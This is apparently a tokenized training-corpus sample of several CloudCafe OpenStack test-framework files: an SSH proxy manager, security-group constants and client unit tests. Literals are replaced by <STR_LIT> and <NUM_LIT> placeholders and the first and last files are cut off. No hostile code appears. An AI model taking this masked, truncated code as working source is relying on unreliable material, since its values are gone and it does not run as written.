wait_for_lbaas_object_status ( <EOL> lbaas_model_type = self . OBJECT_MODEL , ** kwargs ) <EOL> return resp </s>
<s> from cafe . common . reporting import cclogging <EOL> from cloudcafe . networking . networks . common . proxy_mgr . ping_util import PingMixin <EOL> from cloudcafe . networking . networks . common . proxy_mgr . ssh_util import SshMixin <EOL> class NoPasswordProvided ( Exception ) : <EOL> def __init__ ( self ) : <EOL> self . message = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def __str__ ( self ) : <EOL> return self . message <EOL> class NetworkProxyMgr ( PingMixin , SshMixin ) : <EOL> LINUX = '<STR_LIT>' <EOL> WINDOWS = '<STR_LIT>' <EOL> OS = [ LINUX , WINDOWS ] <EOL> DEFAULT_USER = '<STR_LIT:root>' <EOL> PROMPT_PATTERN = r'<STR_LIT>' <EOL> STANDARD_CMD_DELAY = <NUM_LIT:0.5> <EOL> def __init__ ( self , use_proxy = True , proxy_os = LINUX , ip_version = <NUM_LIT:4> , <EOL> logger = None , debug = False ) : <EOL> """<STR_LIT>""" <EOL> self . use_proxy = use_proxy <EOL> self . _proxy_svr = None <EOL> self . _proxy_ip = None <EOL> self . _proxy_os = proxy_os <EOL> self . _ip_version = ip_version <EOL> self . logger = logger or cclogging . getLogger ( <EOL> cclogging . get_object_namespace ( self . __class__ ) ) <EOL> self . connection = None <EOL> self . debug = debug <EOL> self . session_password = None <EOL> self . prompt_pattern = self . PROMPT_PATTERN <EOL> self . last_response = None <EOL> self . _conn_path = [ ] <EOL> self . _pexpect_cmd_delay = self . STANDARD_CMD_DELAY <EOL> def set_proxy_server ( <EOL> self , server_obj , username = DEFAULT_USER , password = None ) : <EOL> """<STR_LIT>""" <EOL> if password is not None : <EOL> server_obj . admin_pass = password <EOL> if ( not hasattr ( server_obj , '<STR_LIT>' ) or <EOL> getattr ( server_obj , '<STR_LIT>' , None ) is None ) : <EOL> raise NoPasswordProvided ( ) <EOL> server_obj . username = username <EOL> self . _proxy_svr = server_obj <EOL> self . _proxy_ip = getattr ( self . _proxy_svr . addresses . public , <EOL> '<STR_LIT>' . format ( ver = self . _ip_version ) ) <EOL> @ property <EOL> def proxy_server_address ( self ) : <EOL> return self . _proxy_ip <EOL> @ property <EOL> def proxy_server_password ( self ) : <EOL> return self . _proxy_svr . admin_pass <EOL> @ proxy_server_password . setter <EOL> def proxy_server_password ( self , password ) : <EOL> self . _proxy_svr . admin_pass = password <EOL> @ property <EOL> def proxy_server_name ( self ) : <EOL> return self . _proxy_svr . name <EOL> @ property <EOL> def proxy_server_user ( self ) : <EOL> return self . _proxy_svr . username <EOL> @ property <EOL> def proxy_server_obj ( self ) : <EOL> return self . _proxy_svr <EOL> @ proxy_server_obj . setter <EOL> def proxy_server_obj ( self , obj ) : <EOL> self . set_proxy_server ( server_obj = obj ) <EOL> def display_conn_info ( self , conn_info ) : <EOL> """<STR_LIT>""" <EOL> output = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . format ( <EOL> conn = conn_info , stdin = conn_info . stdin , stdout = conn_info . stdout , <EOL> all = conn_info . output ) <EOL> per_command = "<STR_LIT>" <EOL> for cmd , out in conn_info . cmd_output . iteritems ( ) : <EOL> command_str = "<STR_LIT>" . format ( cmd , out ) <EOL> per_command = '<STR_LIT>' . format ( per_command , command_str ) <EOL> self . logger . debug ( "<STR_LIT>" . format ( output , per_command ) ) <EOL> @ staticmethod <EOL> def _connect_to_local_proxy ( ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> def display_conn_info ( conn_info ) : <EOL> print "<STR_LIT>" , conn_info <EOL> print '<STR_LIT>' , conn_info . stdout <EOL> print '<STR_LIT>' , conn_info . stdin <EOL> print '<STR_LIT>' , conn_info . output <EOL> print "<STR_LIT>" <EOL> for cmd , out in conn_info . cmd_output . iteritems ( ) : <EOL> print "<STR_LIT>" . format ( cmd , out ) <EOL> class Proxy ( object ) : <EOL> def __init__ ( self , password = None , username = None , id_ = None ) : <EOL> self . admin_pass = password <EOL> self . username = username <EOL> self . id = id_ <EOL> use_proxy = True <EOL> ssh = True <EOL> ping = True <EOL> proxy = NetworkProxyMgr ( use_proxy = use_proxy , ip_version = <NUM_LIT:4> , logger = None , <EOL> debug = True , proxy_os = NetworkProxyMgr . LINUX ) <EOL> username = '<STR_LIT:root>' <EOL> password = '<STR_LIT>' <EOL> proxy . _proxy_ip = '<STR_LIT>' <EOL> target_ip = '<STR_LIT>' <EOL> target_id = '<STR_LIT>' <EOL> proxy . _proxy_svr = Proxy ( <EOL> username = username , password = password , id_ = '<STR_LIT>' ) <EOL> commands = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if ping : <EOL> print "<STR_LIT>" . format ( target_ip , proxy . ping ( target_ip ) ) <EOL> if ssh : <EOL> response = proxy . ssh_to_target ( <EOL> target_ip = target_ip , user = username , password = password , <EOL> proxy_user = username , proxy_pswd = password , <EOL> proxy_ip = proxy . _proxy_ip , cmds = commands ) <EOL> display_conn_info ( response ) <EOL> print "<STR_LIT>" , proxy . _conn_path </s>
<s> """<STR_LIT>""" <EOL> from cloudcafe . networking . networks . common . constants import NeutronErrorTypes , NeutronResponseCodes <EOL> class SecurityGroupsResponseCodes ( NeutronResponseCodes ) : <EOL> """<STR_LIT>""" <EOL> LIST_SECURITY_GROUPS = <NUM_LIT:200> <EOL> GET_SECURITY_GROUP = <NUM_LIT:200> <EOL> CREATE_SECURITY_GROUP = <NUM_LIT> <EOL> UPDATE_SECURITY_GROUP = <NUM_LIT:200> <EOL> DELETE_SECURITY_GROUP = <NUM_LIT> <EOL> LIST_SECURITY_GROUP_RULES = <NUM_LIT:200> <EOL> GET_SECURITY_GROUP_RULE = <NUM_LIT:200> <EOL> CREATE_SECURITY_GROUP_RULE = <NUM_LIT> <EOL> DELETE_SECURITY_GROUP_RULE = <NUM_LIT> <EOL> class SecurityGroupsErrorTypes ( NeutronErrorTypes ) : <EOL> """<STR_LIT>""" <EOL> EGRESS_SECURITY_GROUP_RULES_NOT_ENABLED = ( <EOL> '<STR_LIT>' ) <EOL> INVALID_INPUT = '<STR_LIT>' <EOL> SECURITY_GROUP_INVALID_ICMP_VALUE = '<STR_LIT>' <EOL> SECURITY_GROUP_INVALID_PORT_VALUE = '<STR_LIT>' <EOL> SECURITY_GROUP_MISSING_ICMP_TYPE = '<STR_LIT>' <EOL> SECURITY_GROUP_NOT_FOUND = '<STR_LIT>' <EOL> SECURITY_GROUP_PROTOCOL_REQUIRED_WITH_PORTS = ( <EOL> '<STR_LIT>' ) <EOL> SECURITY_GROUP_RULE_INVALID_ETHERTYPE = ( <EOL> '<STR_LIT>' ) <EOL> SECURITY_GROUP_RULE_INVALID_PROTOCOL = '<STR_LIT>' <EOL> SECURITY_GROUP_RULE_NOT_FOUND = '<STR_LIT>' </s>
<s> extensions = [ ] <EOL> class ResponseExtensionType ( type ) : <EOL> """<STR_LIT>""" <EOL> global extensions <EOL> def __new__ ( cls , class_name , bases , attrs ) : <EOL> extension = super ( ResponseExtensionType , cls ) . __new__ ( <EOL> cls , class_name , bases , attrs ) <EOL> if extension . __extends__ : <EOL> extensions . append ( extension ) <EOL> return extension <EOL> class SimpleResponseExtension ( object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = ResponseExtensionType <EOL> __extends__ = [ ] <EOL> _sub_attr_map = { } <EOL> @ classmethod <EOL> def extend ( cls , obj , ** kwargs ) : <EOL> if obj . __class__ . __name__ not in cls . __extends__ : <EOL> return obj <EOL> for kw_name , attr_name in cls . _sub_attr_map . items ( ) : <EOL> setattr ( obj , attr_name , kwargs . get ( kw_name , None ) ) <EOL> return obj <EOL> class AttributeAggregatingResponseExtension ( SimpleResponseExtension ) : <EOL> """<STR_LIT>""" <EOL> __extends__ = [ ] <EOL> _prefix = None <EOL> _new_dict_attribute_name = None <EOL> @ classmethod <EOL> def extend ( cls , obj , ** kwargs ) : <EOL> if obj . __class__ . __name__ not in cls . __extends__ : <EOL> return obj <EOL> setattr ( obj , cls . _new_dict_attribute_name , dict ( ) ) <EOL> for key , val in kwargs . iteritems ( ) : <EOL> if key . startswith ( cls . _prefix ) : <EOL> obj . metadata [ key [ len ( cls . _prefix ) : : ] ] = val <EOL> return obj </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import unittest <EOL> from cloudcafe . compute . common . models . metadata import Metadata , MetadataItem <EOL> class MetadataModelTest ( unittest . TestCase ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . metadata = Metadata ( ) <EOL> cls . metadata [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> cls . expected_xml = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> cls . expected_json = json . dumps ( { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_metadata_xml_serialization ( self ) : <EOL> serialized_metadata = self . metadata . serialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( serialized_metadata , self . expected_xml ) <EOL> def test_metadata_xml_deserialization ( self ) : <EOL> metadata = Metadata . deserialize ( self . expected_xml , '<STR_LIT>' ) <EOL> self . assertIsNotNone ( metadata ) <EOL> self . assertEqual ( metadata . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def test_metadata_json_serialization ( self ) : <EOL> serialized_metadata = self . metadata . serialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( serialized_metadata , self . expected_json ) <EOL> def test_metadata_json_deserialization ( self ) : <EOL> metadata = Metadata . deserialize ( self . expected_json , '<STR_LIT>' ) <EOL> self . assertIsNotNone ( metadata ) <EOL> self . assertEqual ( metadata . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> class MetadataItemModelTest ( unittest . TestCase ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . meta_item = MetadataItem ( ) <EOL> cls . meta_item [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> cls . expected_xml = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> cls . expected_json = json . dumps ( { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_metadata_item_json_serialization ( self ) : <EOL> serialized_metadata = self . meta_item . serialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( serialized_metadata , self . expected_json ) <EOL> def test_metadata_xml_serialization ( self ) : <EOL> serialized_metadata = self . meta_item . serialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( serialized_metadata , self . expected_xml ) <EOL> def test_metadata_xml_deserialization ( self ) : <EOL> meta = MetadataItem . deserialize ( self . expected_xml , '<STR_LIT>' ) <EOL> self . assertIsNotNone ( meta ) <EOL> self . assertEqual ( meta . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def test_metadata_json_deserialization ( self ) : <EOL> meta = MetadataItem . deserialize ( self . expected_json , '<STR_LIT>' ) <EOL> self . assertIsNotNone ( meta ) <EOL> self . assertEqual ( meta . get ( '<STR_LIT>' ) , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from httpretty import HTTPretty <EOL> from cloudcafe . compute . hosts_api . client import HostsClient <EOL> from metatests . cloudcafe . compute . fixtures import ClientTestFixture <EOL> from metatests . cloudcafe . compute . hosts . client . responses import HostsMockResponse <EOL> HOST_NAME = "<STR_LIT>" <EOL> class HostsClientTest ( ClientTestFixture ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( HostsClientTest , cls ) . setUpClass ( ) <EOL> cls . hosts_client = HostsClient ( <EOL> url = cls . COMPUTE_API_ENDPOINT , <EOL> auth_token = cls . AUTH_TOKEN , <EOL> serialize_format = cls . FORMAT , <EOL> deserialize_format = cls . FORMAT <EOL> ) <EOL> cls . hosts_uri = "<STR_LIT>" . format ( cls . COMPUTE_API_ENDPOINT ) <EOL> cls . host_uri = "<STR_LIT>" . format ( cls . hosts_uri , HOST_NAME ) <EOL> cls . mock_response = HostsMockResponse ( cls . FORMAT ) <EOL> def test_list_hosts ( self ) : <EOL> HTTPretty . register_uri ( HTTPretty . GET , self . hosts_uri , <EOL> body = self . mock_response . list_hosts ( ) ) <EOL> response = self . hosts_client . list_hosts ( ) <EOL> self . assertEqual ( <NUM_LIT:200> , response . status_code ) <EOL> self . assertEqual ( self . mock_response . list_hosts ( ) , response . content ) <EOL> def test_get_host ( self ) : <EOL> HTTPretty . register_uri ( HTTPretty . GET , self . host_uri , <EOL> body = self . mock_response . get_host ( ) ) <EOL> response = self . hosts_client . get_host ( HOST_NAME ) <EOL> self . assertEqual ( <NUM_LIT:200> , response . status_code ) <EOL> self . assertEqual ( self . mock_response . get_host ( ) , response . content ) </s>
<s> """<STR_LIT>""" <EOL> import mock <EOL> import unittest <EOL> from cloudcafe . networking . lbaas . lbaas_api . listener . behaviors import ListenerBehaviors <EOL> from cloudcafe . networking . lbaas . lbaas_api . listener . client import ListenersClient <EOL> class ListenerBehaviorsFixture ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( ListenerBehaviorsFixture , cls ) . setUpClass ( ) <EOL> cls . auth_token = "<STR_LIT>" <EOL> cls . url = "<STR_LIT>" <EOL> cls . listener_id = "<STR_LIT>" <EOL> cls . name = "<STR_LIT>" <EOL> cls . load_balancer_id = "<STR_LIT>" <EOL> cls . tenant_id = "<STR_LIT>" <EOL> cls . default_pool_id = "<STR_LIT>" <EOL> cls . protocol = "<STR_LIT>" <EOL> cls . protocol_port = <NUM_LIT> <EOL> cls . description = "<STR_LIT>" <EOL> cls . connection_limit = <NUM_LIT:200> <EOL> cls . admin_state_up = True <EOL> cls . desired_status = "<STR_LIT>" <EOL> cls . interval_time = <NUM_LIT:20> <EOL> cls . timeout = <NUM_LIT> <EOL> cls . listeners_client = ListenersClient ( <EOL> url = cls . url , <EOL> auth_token = cls . auth_token , <EOL> serialize_format = cls . SERIALIZE , <EOL> deserialize_format = cls . DESERIALIZE ) <EOL> cls . listener_behaviors = ListenerBehaviors ( <EOL> listeners_client = cls . listeners_client , config = None ) <EOL> class ListenerBehaviorsTests ( object ) : <EOL> @ mock . patch . object ( ListenerBehaviors , '<STR_LIT>' , <EOL> autospec = True ) <EOL> def test_create_active_listener ( self , mock_request ) : <EOL> create_active_listener_kwargs = ( <EOL> { '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT>' : self . load_balancer_id , <EOL> '<STR_LIT>' : self . tenant_id , <EOL> '<STR_LIT>' : self . default_pool_id , <EOL> '<STR_LIT>' : self . protocol , <EOL> '<STR_LIT>' : self . protocol_port , <EOL> '<STR_LIT:description>' : self . description , <EOL> '<STR_LIT>' : self . connection_limit , <EOL> '<STR_LIT>' : self . admin_state_up } ) <EOL> self . listener_behaviors . create_active_listener ( <EOL> ** create_active_listener_kwargs ) <EOL> mock_request . assert_called_once_with ( <EOL> self . listener_behaviors , <EOL> ** create_active_listener_kwargs ) <EOL> @ mock . patch . object ( ListenerBehaviors , <EOL> '<STR_LIT>' , <EOL> autospec = True ) <EOL> def test_update_listener_and_wait_for_active ( self , mock_request ) : <EOL> update_listener_and_wait_for_active_kwargs = ( <EOL> { '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT:description>' : self . description , <EOL> '<STR_LIT>' : self . default_pool_id , <EOL> '<STR_LIT>' : self . load_balancer_id , <EOL> '<STR_LIT>' : self . admin_state_up } ) <EOL> self . listener_behaviors . update_listener_and_wait_for_active ( <EOL> ** update_listener_and_wait_for_active_kwargs ) <EOL> mock_request . assert_called_once_with ( <EOL> self . listener_behaviors , <EOL> ** update_listener_and_wait_for_active_kwargs ) <EOL> @ mock . patch . object ( ListenerBehaviors , <EOL> '<STR_LIT>' , <EOL> autospec = True ) <EOL> def test_wait_for_listener_status ( self , mock_request ) : <EOL> wait_for_listener_status_kwargs = ( <EOL> { '<STR_LIT>' : self . listener_id , <EOL> '<STR_LIT>' : self . desired_status , <EOL> '<STR_LIT>' : self . interval_time , <EOL> '<STR_LIT>' : self . timeout } ) <EOL> self . listener_behaviors . wait_for_listener_status ( <EOL> ** wait_for_listener_status_kwargs ) <EOL> mock_request . assert_called_once_with ( <EOL> self . listener_behaviors , <EOL> ** wait_for_listener_status_kwargs ) <EOL> class ListenersClientTestsXML ( ListenerBehaviorsFixture , <EOL> ListenerBehaviorsTests ) : <EOL> SERIALIZE = '<STR_LIT>' <EOL> DESERIALIZE = '<STR_LIT>' <EOL> class ListenersClientTestsJSON ( ListenerBehaviorsFixture , <EOL> ListenerBehaviorsTests ) : <EOL> SERIALIZE = '<STR_LIT>' <EOL> DESERIALIZE = '<STR_LIT>' </s>
<s> import unittest <EOL> from cloudcafe . openstackcli . novacli . client import NovaCLI <EOL> class NovaCLI_InitializeClientWithAllArguments ( unittest . TestCase ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . novacli = NovaCLI ( <EOL> os_cache = True , timings = True , timeout = <NUM_LIT:30> , <EOL> os_username = '<STR_LIT>' , os_password = '<STR_LIT>' , <EOL> os_tenant_name = '<STR_LIT>' , os_tenant_id = '<STR_LIT>' , <EOL> os_auth_url = '<STR_LIT>' , os_region_name = '<STR_LIT>' , <EOL> os_auth_system = '<STR_LIT>' , service_type = '<STR_LIT>' , <EOL> volume_service_name = '<STR_LIT>' , endpoint_type = '<STR_LIT>' , <EOL> os_compute_api_version = '<STR_LIT>' , os_cacert = '<STR_LIT>' , <EOL> insecure = True , bypass_url = '<STR_LIT>' ) <EOL> cls . base_cmd = cls . novacli . base_cmd ( ) <EOL> def test_os_cache ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_timings ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_timeout ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_username ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_password ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_tenant_name ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_tenant_id ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_auth_url ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_region_name ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_auth_system ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_service_type ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_volume_service_name ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_endpoint_type ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_compute_api_version ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_cacert ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_insecure ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_bypass_url ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_no_arguments_positive ( self ) : <EOL> novacli = NovaCLI ( ) <EOL> self . assertEquals ( novacli . base_cmd ( ) . strip ( ) , '<STR_LIT>' ) <EOL> class NovaCLI_CommandSerializationTests_CreateServer ( unittest . TestCase ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> class FakeResponse ( object ) : <EOL> def __init__ ( self , cmd ) : <EOL> self . command = cmd <EOL> self . standard_out = "<STR_LIT>" <EOL> cls . novacli = NovaCLI ( ) <EOL> cls . novacli . run_command = lambda x : FakeResponse ( x ) <EOL> cls . command = cls . novacli . create_server ( <EOL> name = '<STR_LIT>' , <EOL> no_service_net = True , <EOL> no_public = True , <EOL> disk_config = '<STR_LIT>' , <EOL> flavor = '<STR_LIT>' , <EOL> image = '<STR_LIT>' , <EOL> boot_volume = '<STR_LIT>' , <EOL> snapshot = '<STR_LIT>' , <EOL> num_instances = '<STR_LIT>' , <EOL> key_name = '<STR_LIT>' , <EOL> user_data = '<STR_LIT>' , <EOL> availability_zone = '<STR_LIT>' , <EOL> security_groups = '<STR_LIT>' , <EOL> swap = <NUM_LIT:100> , <EOL> config_drive = '<STR_LIT>' , <EOL> image_with = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> meta = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> file_ = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> block_device_mapping = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> block_device = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ephemeral = { '<STR_LIT:size>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> hint = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> nic = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) . command <EOL> def test_no_arguments ( self ) : <EOL> r = self . novacli . create_server ( "<STR_LIT>" ) <EOL> self . assertEqual ( r . command . strip ( ) , "<STR_LIT>" ) <EOL> def test_name ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_no_service_net ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_no_public ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_disk_config ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_flavor ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_image ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_boot_volume ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_snapshot ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_num_instances ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_key_name ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_user_data ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_availability_zone ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_security_groups ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_swap ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_config_drive ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_image_with ( self ) : <EOL> self . assertIn ( <EOL> "<STR_LIT>" , <EOL> self . command ) <EOL> def test_meta ( self ) : <EOL> self . assertIn ( <EOL> "<STR_LIT>" , self . command ) <EOL> self . assertIn ( <EOL> "<STR_LIT>" , self . command ) <EOL> def test_file ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_block_device_mapping ( self ) : <EOL> self . assertIn ( <EOL> "<STR_LIT>" , <EOL> self . command ) <EOL> def test_block_device ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_ephemeral ( self ) : <EOL> self . assertIn ( <EOL> "<STR_LIT>" , <EOL> self . command ) <EOL> def test_hint ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_nic ( self ) : <EOL> self . assertIn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , self . command ) </s>
<s> """<STR_LIT>""" <EOL> from cafe . drivers . unittest . decorators import data_driven_test , DataDrivenFixture <EOL> from cloudcafe . blockstorage . volumes_api . common . models import statuses <EOL> from cloudcafe . blockstorage . datasets import BlockstorageDatasets <EOL> from cloudroast . blockstorage . volumes_api . fixtures import VolumesTestFixture <EOL> complete_volume_types = BlockstorageDatasets . volume_types ( ) <EOL> complete_volume_types . apply_test_tags ( '<STR_LIT>' ) <EOL> default_volume_type = BlockstorageDatasets . default_volume_type ( ) <EOL> default_volume_type . apply_test_tags ( '<STR_LIT>' ) <EOL> complete_volume_types . merge_dataset_tags ( default_volume_type ) <EOL> @ DataDrivenFixture <EOL> class SnapshotActions ( VolumesTestFixture ) : <EOL> @ data_driven_test ( complete_volume_types ) <EOL> def ddtest_verify_snapshot_status_progression ( <EOL> self , volume_type_name , volume_type_id ) : <EOL> """<STR_LIT>""" <EOL> volume = self . new_volume ( vol_type = volume_type_id ) <EOL> snapshot_name = self . random_snapshot_name ( ) <EOL> snapshot_description = "<STR_LIT>" <EOL> snapshot = self . volumes . behaviors . create_available_snapshot ( <EOL> volume . id_ , name = snapshot_name , description = snapshot_description ) <EOL> self . addCleanup ( <EOL> self . volumes . behaviors . delete_snapshot_confirmed , snapshot . id_ ) <EOL> self . assertEquals ( snapshot . volume_id , volume . id_ ) <EOL> self . assertEquals ( snapshot . name , snapshot_name ) <EOL> self . assertEquals ( snapshot . description , snapshot_description ) <EOL> self . assertIn ( <EOL> snapshot . status , <EOL> [ statuses . Snapshot . AVAILABLE , statuses . Snapshot . CREATING ] ) <EOL> self . assertEquals ( snapshot . size , volume . size ) <EOL> @ data_driven_test ( complete_volume_types ) <EOL> def ddtest_verify_snapshot_restore_to_same_volume_type ( <EOL> self , volume_type_name , volume_type_id ) : <EOL> """<STR_LIT>""" <EOL> original_volume = self . new_volume ( vol_type = volume_type_id ) <EOL> snapshot = self . new_snapshot ( original_volume . id_ ) <EOL> resp = self . volumes . client . create_volume ( <EOL> original_volume . size , original_volume . volume_type , <EOL> snapshot_id = snapshot . id_ ) <EOL> self . assertResponseDeserializedAndOk ( resp ) <EOL> self . addCleanup ( <EOL> self . volumes . behaviors . delete_volume_confirmed , resp . entity . id_ ) <EOL> self . assertRestoreSnapshotToVolumeSucceeded ( <EOL> resp . entity . id_ , resp . entity . size ) <EOL> restored_volume = self . volumes . behaviors . get_volume_info ( <EOL> resp . entity . id_ ) <EOL> comparable_attributes_list = [ <EOL> "<STR_LIT:size>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT:status>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> self . assertVolumeAttributesAreEqual ( <EOL> original_volume , restored_volume , <EOL> attr_list = comparable_attributes_list ) <EOL> @ data_driven_test ( complete_volume_types ) <EOL> def ddtest_list_snapshots ( <EOL> self , volume_type_name , volume_type_id ) : <EOL> """<STR_LIT>""" <EOL> volume = self . new_volume ( vol_type = volume_type_id ) <EOL> snapshot = self . new_snapshot ( volume . id_ ) <EOL> resp = self . volumes . client . list_all_snapshots ( ) <EOL> self . assertResponseDeserializedAndOk ( <EOL> resp , '<STR_LIT>' . format ( <EOL> volume . id_ ) ) <EOL> snapshot_list = resp . entity <EOL> self . assertIn ( snapshot . name , [ s . name for s in snapshot_list ] ) <EOL> self . assertIn ( snapshot . id_ , [ s . id_ for s in snapshot_list ] ) <EOL> @ data_driven_test ( complete_volume_types ) <EOL> def ddtest_list_detailed_snapshots ( <EOL> self , volume_type_name , volume_type_id ) : <EOL> """<STR_LIT>""" <EOL> volume = self . new_volume ( vol_type = volume_type_id ) <EOL> snapshot = self . new_snapshot ( volume . id_ ) <EOL> resp = self . volumes . client . list_all_snapshots_info ( ) <EOL> self . assertResponseDeserializedAndOk ( <EOL> resp , '<STR_LIT>' . format ( <EOL> volume . id_ ) ) <EOL> snapshot_list = resp . entity <EOL> self . assertIn ( snapshot . name , [ s . name for s in snapshot_list ] ) <EOL> self . assertIn ( snapshot . id_ , [ s . id_ for s in snapshot_list ] ) <EOL> @ data_driven_test ( complete_volume_types ) <EOL> def ddtest_get_snapshot_info ( <EOL> self , volume_type_name , volume_type_id ) : <EOL> """<STR_LIT>""" <EOL> volume = self . new_volume ( vol_type = volume_type_id ) <EOL> snapshot = self . new_snapshot ( volume . id_ ) <EOL> resp = self . volumes . client . get_snapshot_info ( snapshot . id_ ) <EOL> self . assertResponseDeserializedAndOk ( <EOL> resp , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( snapshot . id_ , volume . id_ ) ) <EOL> snapshot_info = resp . entity <EOL> self . assertEqual ( snapshot . name , snapshot_info . name ) <EOL> self . assertEqual ( snapshot . id_ , snapshot_info . id_ ) </s>
<s> """<STR_LIT>""" <EOL> from cafe . drivers . unittest . decorators import tags <EOL> from cloudcafe . compute . common . exceptions import ItemNotFound <EOL> from cloudroast . compute . fixtures import ComputeFixture <EOL> class ImagesMetadataNegativeTest ( ComputeFixture ) : <EOL> @ tags ( type = '<STR_LIT>' , net = '<STR_LIT>' ) <EOL> def test_list_image_metadata_for_nonexistent_image ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . assertRaises ( ItemNotFound ) : <EOL> self . images_client . list_image_metadata ( <NUM_LIT> ) <EOL> @ tags ( type = '<STR_LIT>' , net = '<STR_LIT>' ) <EOL> def test_get_image_metadata_item_for_nonexistent_image ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . assertRaises ( ItemNotFound ) : <EOL> self . images_client . get_image_metadata_item ( <NUM_LIT> , '<STR_LIT>' ) <EOL> @ tags ( type = '<STR_LIT>' , net = '<STR_LIT>' ) <EOL> def test_set_image_metadata_item_for_nonexistent_image ( self ) : <EOL> """<STR_LIT>""" <EOL> 